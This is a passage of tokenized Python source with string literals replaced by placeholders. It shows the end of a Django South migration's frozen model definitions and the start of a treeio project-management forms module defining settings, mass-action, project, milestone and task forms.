'<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:object_name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:label>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:body>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT:body>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> from django . forms import ModelForm , CharField , TextInput , Form , ModelChoiceField , IntegerField , ChoiceField <EOL> from treeio . projects . models import Project , Milestone , Task , TaskTimeSlot , TaskStatus <EOL> from treeio . core . models import Object , ModuleSetting , UpdateRecord <EOL> from treeio . identities . models import Contact <EOL> from datetime import timedelta , datetime <EOL> from django . core . urlresolvers import reverse <EOL> from django . utils . translation import ugettext as _ <EOL> from treeio . core . decorators import preprocess_form <EOL> preprocess_form ( ) <EOL> class SettingsForm ( Form ) : <EOL> """<STR_LIT>""" <EOL> default_task_status = ModelChoiceField ( <EOL> label = '<STR_LIT>' , queryset = [ ] ) <EOL> def __init__ ( self , user , * args , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> super ( SettingsForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( user , <EOL> TaskStatus . objects , mode = '<STR_LIT:x>' ) <EOL> try : <EOL> conf = ModuleSetting . get_for_module ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> default_task_status = TaskStatus . objects . get ( pk = long ( conf . value ) ) <EOL> self . fields [ '<STR_LIT>' ] . initial = default_task_status . id <EOL> except Exception : <EOL> pass <EOL> def save ( self ) : <EOL> "<STR_LIT>" <EOL> try : <EOL> ModuleSetting . set_for_module ( '<STR_LIT>' , <EOL> self . cleaned_data [ <EOL> '<STR_LIT>' ] . id , <EOL> '<STR_LIT>' ) <EOL> except Exception : <EOL> return False <EOL> class MassActionForm ( Form ) : <EOL> """<STR_LIT>""" <EOL> status = ModelChoiceField ( queryset = [ ] , required = False ) <EOL> project = ModelChoiceField ( queryset = [ ] , required = False ) <EOL> milestone = ModelChoiceField ( queryset = [ ] , required = False ) <EOL> delete = ChoiceField ( label = _ ( "<STR_LIT>" ) , choices = ( ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) ) , required = False ) <EOL> instance = None <EOL> def __init__ ( self , user , * args , ** kwargs ) : <EOL> if '<STR_LIT>' in kwargs : <EOL> self . instance = kwargs [ '<STR_LIT>' ] <EOL> del kwargs [ '<STR_LIT>' ] <EOL> super ( MassActionForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT:status>' ] . queryset = Object . filter_permitted ( <EOL> user , TaskStatus . objects , mode = '<STR_LIT:x>' ) <EOL> self . fields [ '<STR_LIT:status>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Project . objects , mode = '<STR_LIT:x>' ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Milestone . objects , mode = '<STR_LIT:x>' ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] = ChoiceField ( label = _ ( "<STR_LIT>" ) , choices = ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , _ ( <EOL> '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) ) , required = False ) <EOL> def save ( self , * args , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> if self . instance : <EOL> if self . is_valid ( ) : <EOL> if self . cleaned_data [ '<STR_LIT>' ] : <EOL> self . instance . project = self . cleaned_data [ '<STR_LIT>' ] <EOL> if self . cleaned_data [ '<STR_LIT:status>' ] : <EOL> self . instance . status = self . cleaned_data [ '<STR_LIT:status>' ] <EOL> if self . cleaned_data [ '<STR_LIT>' ] : <EOL> self . instance . milestone = self . cleaned_data [ '<STR_LIT>' ] <EOL> self . instance . save ( ) <EOL> if self . cleaned_data [ '<STR_LIT>' ] : <EOL> if self . cleaned_data [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> self . instance . delete ( ) <EOL> if self . cleaned_data [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> self . instance . trash = True <EOL> self . instance . save ( ) <EOL> class ProjectForm ( ModelForm ) : <EOL> """<STR_LIT>""" <EOL> name = CharField ( widget = TextInput ( attrs = { '<STR_LIT:size>' : '<STR_LIT>' } ) ) <EOL> def __init__ ( self , user , project_id , * args , ** kwargs ) : <EOL> super ( ProjectForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT:name>' ] . label = _ ( "<STR_LIT:Name>" ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Project . objects , mode = '<STR_LIT:x>' ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> if project_id : <EOL> self . fields [ '<STR_LIT>' ] . initial = project_id <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Contact . objects , mode = '<STR_LIT:x>' ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Contact . objects , mode = '<STR_LIT:x>' ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> class Meta : <EOL> """<STR_LIT>""" <EOL> model = Project <EOL> fields = ( '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class MilestoneForm ( ModelForm ) : <EOL> """<STR_LIT>""" <EOL> name = CharField ( widget = TextInput ( attrs = { '<STR_LIT:size>' : '<STR_LIT>' } ) ) <EOL> def __init__ ( self , user , project_id , * args , ** kwargs ) : <EOL> super ( MilestoneForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT:name>' ] . label = _ ( "<STR_LIT:Name>" ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Project . objects , mode = '<STR_LIT:x>' ) <EOL> if project_id : <EOL> self . fields [ '<STR_LIT>' ] . initial = project_id <EOL> self . fields [ '<STR_LIT:status>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT:status>' ] . queryset = Object . filter_permitted ( <EOL> user , TaskStatus . objects , mode = '<STR_LIT:x>' ) <EOL> try : <EOL> conf = ModuleSetting . get_for_module ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> self . fields [ '<STR_LIT:status>' ] . initial = long ( conf . value ) <EOL> except Exception : <EOL> pass <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> if '<STR_LIT>' in kwargs : <EOL> instance = kwargs [ '<STR_LIT>' ] <EOL> if instance . start_date : <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT>' : instance . start_date . strftime ( '<STR_LIT:%s>' ) } ) <EOL> if instance . end_date : <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT>' : instance . end_date . strftime ( '<STR_LIT:%s>' ) } ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> class Meta : <EOL> "<STR_LIT>" <EOL> model = Milestone <EOL> fields = ( <EOL> '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT:status>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class TaskForm ( ModelForm ) : <EOL> """<STR_LIT>""" <EOL> name = CharField ( widget = TextInput ( attrs = { '<STR_LIT:size>' : '<STR_LIT>' } ) ) <EOL> def __init__ ( self , user , parent , project_id , milestone_id , * args , ** kwargs ) : <EOL> "<STR_LIT>" <EOL> super ( TaskForm , self ) . __init__ ( * args , ** kwargs ) <EOL> self . fields [ '<STR_LIT:name>' ] . label = _ ( "<STR_LIT:Name>" ) <EOL> self . fields [ '<STR_LIT:name>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> self . fields [ '<STR_LIT:status>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT:status>' ] . queryset = Object . filter_permitted ( <EOL> user , TaskStatus . objects , mode = '<STR_LIT:x>' ) <EOL> try : <EOL> conf = ModuleSetting . get_for_module ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> self . fields [ '<STR_LIT:status>' ] . initial = long ( conf . value ) <EOL> except Exception : <EOL> pass <EOL> self . user = user <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . help_text = "<STR_LIT>" <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Contact . objects , mode = '<STR_LIT:x>' ) <EOL> if not self . instance . id : <EOL> contact = user . get_contact ( ) <EOL> if contact : <EOL> self . fields [ '<STR_LIT>' ] . initial = contact . id <EOL> self . instance . caller = contact <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( <EOL> { '<STR_LIT>' : reverse ( '<STR_LIT>' ) } ) <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Project . objects , mode = '<STR_LIT:x>' ) <EOL> if project_id : <EOL> self . fields [ '<STR_LIT>' ] . initial = project_id <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . queryset = Object . filter_permitted ( <EOL> user , Milestone . objects , mode = '<STR_LIT:x>' ) <EOL> if milestone_id : <EOL> self . fields [ '<STR_LIT>' ] . initial = milestone_id <EOL> self . fields [ '<STR_LIT>' ] . label = _ ( "<STR_LIT>" ) <EOL> self . fields [ '<STR_LIT>' ] . widget . attrs . update ( { '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : reverse ( '<STR_LIT>' ) 